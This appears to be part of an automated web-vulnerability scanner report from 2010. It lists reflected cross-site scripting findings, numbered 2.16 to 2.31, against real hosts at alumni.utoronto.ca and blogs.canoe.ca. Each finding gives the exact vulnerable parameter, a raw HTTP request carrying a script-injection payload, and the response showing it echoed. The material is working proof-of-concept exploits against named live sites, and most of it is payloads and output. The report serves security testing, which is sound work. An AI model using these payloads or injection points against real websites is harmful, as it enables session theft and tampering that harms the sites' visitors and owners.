Cookie: __utmz=168379761.1290653903.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=168379761.1501729055.1290653903.1290653903.1290653903.1; __utmc=168379761; __utmb=168379761.1.10.1290653903; AL_LastUpdated=11/24/2010 8:58:24 PM;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Nov 2010 03:34:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: AL_LastUpdated=11/24/2010 9:34:21 PM; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<![CDATA[

RedirectUrl = 'http://alumni.utoronto.ca/s/731/index.aspx?sid=731&gid=3631e5d'-alert(1)-'fdc12b29cb&pgid=3&cid=421';
CanRedirect = true;
jQuery(document).ready(function()
{
   var cookiesEnabled = false;
   var TEST_COOKIE = 'test_cookie';
   jQuery.cookie( TEST_COOKIE, true );
   if ( jQuery.cookie
...[SNIP]...

2.16. http://alumni.utoronto.ca/s/731/index.aspx [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alumni.utoronto.ca
Path:   /s/731/index.aspx

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9253'-alert(1)-'bf9bf44c49b was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /s/731/index.aspx?sid=731b9253'-alert(1)-'bf9bf44c49b&gid=36&pgid=8&cid=46 HTTP/1.1
Host: alumni.utoronto.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=168379761.1290653903.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=168379761.1501729055.1290653903.1290653903.1290653903.1; __utmc=168379761; __utmb=168379761.1.10.1290653903; AL_LastUpdated=11/24/2010 8:58:24 PM;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Nov 2010 03:34:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: AL_LastUpdated=11/24/2010 9:34:07 PM; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<![CDATA[

RedirectUrl = 'http://alumni.utoronto.ca/s/731/index.aspx?sid=731b9253'-alert(1)-'bf9bf44c49b&gid=36&pgid=3&cid=421';
CanRedirect = true;
jQuery(document).ready(function()
{
   var cookiesEnabled = false;
   var TEST_COOKIE = 'test_cookie';
   jQuery.cookie( TEST_COOKIE, true );
   if ( jQuery
...[SNIP]...

2.17. http://blogs.canoe.ca/autonet/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /autonet/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2712"><script>alert(1)</script>b1948fbcb83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2712\"><script>alert(1)</script>b1948fbcb83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autonet/?b2712"><script>alert(1)</script>b1948fbcb83=1 HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50479
Date: Thu, 25 Nov 2010 03:34:41 GMT
X-Varnish: 1749439543
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-01
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/autonet/?b2712\"><script>alert(1)</script>b1948fbcb83=1"/>
...[SNIP]...

2.18. http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /canoedossier/media-matters/internet-overload/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a478"><script>alert(1)</script>7dbc33121e8 was submitted in the REST URL parameter 2. This input was echoed as 7a478\"><script>alert(1)</script>7dbc33121e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /canoedossier/media-matters7a478"><script>alert(1)</script>7dbc33121e8/internet-overload/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/canoedossier/?p=29011>; rel=shortlink
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51002
Date: Thu, 25 Nov 2010 03:34:44 GMT
X-Varnish: 1749439634
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-01
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/canoedossier/media-matters7a478\"><script>alert(1)</script>7dbc33121e8/internet-overload/"/>
...[SNIP]...

2.19. http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /canoedossier/media-matters/internet-overload/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 201de"><script>alert(1)</script>67b7a76f5af was submitted in the REST URL parameter 3. This input was echoed as 201de\"><script>alert(1)</script>67b7a76f5af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /canoedossier/media-matters/internet-overload201de"><script>alert(1)</script>67b7a76f5af/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 03:34:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
ServerID: blogswordpress-prod-fe-01
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 36359
Date: Thu, 25 Nov 2010 03:34:46 GMT
X-Varnish: 136324858
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/canoedossier/media-matters/internet-overload201de\"><script>alert(1)</script>67b7a76f5af/"/>
...[SNIP]...

2.20. http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /canoedossier/media-matters/internet-overload/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8092"><script>alert(1)</script>6280b21678b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8092\"><script>alert(1)</script>6280b21678b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /canoedossier/media-matters/internet-overload/?e8092"><script>alert(1)</script>6280b21678b=1 HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/canoedossier/?p=29011>; rel=shortlink
ServerID: blogswordpress-prod-fe-01
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51008
Date: Thu, 25 Nov 2010 03:34:43 GMT
X-Varnish: 136324764
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/?e8092\"><script>alert(1)</script>6280b21678b=1"/>
...[SNIP]...

2.21. http://blogs.canoe.ca/canoetech/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /canoetech/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1d5c"><script>alert(1)</script>846a8300d21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1d5c\"><script>alert(1)</script>846a8300d21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /canoetech/?f1d5c"><script>alert(1)</script>846a8300d21=1 HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 67380
Date: Thu, 25 Nov 2010 03:34:40 GMT
X-Varnish: 1749439514
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-01
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/canoetech/?f1d5c\"><script>alert(1)</script>846a8300d21=1"/>
...[SNIP]...

2.22. http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /ent/general/cookie-monster-lobbies-for-snl-gig/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1691"><script>alert(1)</script>d8026cbd7ed was submitted in the REST URL parameter 2. This input was echoed as e1691\"><script>alert(1)</script>d8026cbd7ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ent/generale1691"><script>alert(1)</script>d8026cbd7ed/cookie-monster-lobbies-for-snl-gig/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/ent/?p=47411>; rel=shortlink
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 34261
Date: Thu, 25 Nov 2010 03:34:47 GMT
X-Varnish: 136324891
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/ent/generale1691\"><script>alert(1)</script>d8026cbd7ed/cookie-monster-lobbies-for-snl-gig/"/>
...[SNIP]...

2.23. http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /ent/general/cookie-monster-lobbies-for-snl-gig/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca1a"><script>alert(1)</script>657ebe2a02a was submitted in the REST URL parameter 3. This input was echoed as 5ca1a\"><script>alert(1)</script>657ebe2a02a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ent/general/cookie-monster-lobbies-for-snl-gig5ca1a"><script>alert(1)</script>657ebe2a02a/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 03:34:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29058
Date: Thu, 25 Nov 2010 03:34:49 GMT
X-Varnish: 136324934
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig5ca1a\"><script>alert(1)</script>657ebe2a02a/"/>
...[SNIP]...

2.24. http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /ent/general/cookie-monster-lobbies-for-snl-gig/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6a9"><script>alert(1)</script>96607731768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6a9\"><script>alert(1)</script>96607731768 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ent/general/cookie-monster-lobbies-for-snl-gig/?eb6a9"><script>alert(1)</script>96607731768=1 HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/ent/?p=47411>; rel=shortlink
ServerID: blogswordpress-prod-fe-02
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 34267
Date: Thu, 25 Nov 2010 03:34:46 GMT
X-Varnish: 1749439679
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-01
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/?eb6a9\"><script>alert(1)</script>96607731768=1"/>
...[SNIP]...

2.25. http://blogs.canoe.ca/loadthis/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /loadthis/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704a4"><script>alert(1)</script>37fcfb8bb67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 704a4\"><script>alert(1)</script>37fcfb8bb67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loadthis/?704a4"><script>alert(1)</script>37fcfb8bb67=1 HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ServerID: blogswordpress-prod-fe-02
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 65161
Date: Thu, 25 Nov 2010 03:34:40 GMT
X-Varnish: 136324700
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/loadthis/?704a4\"><script>alert(1)</script>37fcfb8bb67=1"/>
...[SNIP]...

2.26. http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /travel/vacation-time/is-the-airport-experience-too-intrusive/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0967"><script>alert(1)</script>b7c1d13b7b0 was submitted in the REST URL parameter 2. This input was echoed as c0967\"><script>alert(1)</script>b7c1d13b7b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/vacation-timec0967"><script>alert(1)</script>b7c1d13b7b0/is-the-airport-experience-too-intrusive/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/travel/?p=12031>; rel=shortlink
ServerID: blogswordpress-prod-fe-02
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 43354
Date: Thu, 25 Nov 2010 03:34:38 GMT
X-Varnish: 136324620
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/travel/vacation-timec0967\"><script>alert(1)</script>b7c1d13b7b0/is-the-airport-experience-too-intrusive/"/>
...[SNIP]...

2.27. http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /travel/vacation-time/is-the-airport-experience-too-intrusive/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca97"><script>alert(1)</script>90f0d532ff was submitted in the REST URL parameter 3. This input was echoed as cca97\"><script>alert(1)</script>90f0d532ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/vacation-time/is-the-airport-experience-too-intrusivecca97"><script>alert(1)</script>90f0d532ff/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 03:34:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28898
Date: Thu, 25 Nov 2010 03:34:39 GMT
X-Varnish: 1749439483
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-01
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusivecca97\"><script>alert(1)</script>90f0d532ff/"/>
...[SNIP]...

2.28. http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /travel/vacation-time/is-the-airport-experience-too-intrusive/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930de"><script>alert(1)</script>509944ca179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 930de\"><script>alert(1)</script>509944ca179 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/vacation-time/is-the-airport-experience-too-intrusive/?930de"><script>alert(1)</script>509944ca179=1 HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/travel/?p=12031>; rel=shortlink
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 43360
Date: Thu, 25 Nov 2010 03:34:36 GMT
X-Varnish: 136324570
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/?930de\"><script>alert(1)</script>509944ca179=1"/>
...[SNIP]...

2.29. http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57645"><script>alert(1)</script>a7718bd3c3a was submitted in the REST URL parameter 2. This input was echoed as 57645\"><script>alert(1)</script>a7718bd3c3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vancouver2010/general57645"><script>alert(1)</script>a7718bd3c3a/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/vancouver2010/?p=32671>; rel=shortlink
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 38272
Date: Thu, 25 Nov 2010 03:34:48 GMT
X-Varnish: 136324905
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/vancouver2010/general57645\"><script>alert(1)</script>a7718bd3c3a/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/"/>
...[SNIP]...

2.30. http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537cc"><script>alert(1)</script>27e8a14e0e5 was submitted in the REST URL parameter 3. This input was echoed as 537cc\"><script>alert(1)</script>27e8a14e0e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess537cc"><script>alert(1)</script>27e8a14e0e5/ HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 03:34:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
ServerID: blogswordpress-prod-fe-01
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 20295
Date: Thu, 25 Nov 2010 03:34:49 GMT
X-Varnish: 136324935
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-02
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess537cc\"><script>alert(1)</script>27e8a14e0e5/"/>
...[SNIP]...

2.31. http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.canoe.ca
Path:   /vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa79e"><script>alert(1)</script>334bc9a1cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa79e\"><script>alert(1)</script>334bc9a1cfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/?fa79e"><script>alert(1)</script>334bc9a1cfe=1 HTTP/1.1
Host: blogs.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Link: <http://blogs.canoe.ca/vancouver2010/?p=32671>; rel=shortlink
ServerID: blogswordpress-prod-fe-03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 38278
Date: Thu, 25 Nov 2010 03:34:46 GMT
X-Varnish: 1749439676
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: blogswordpress-prod-rp-01
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
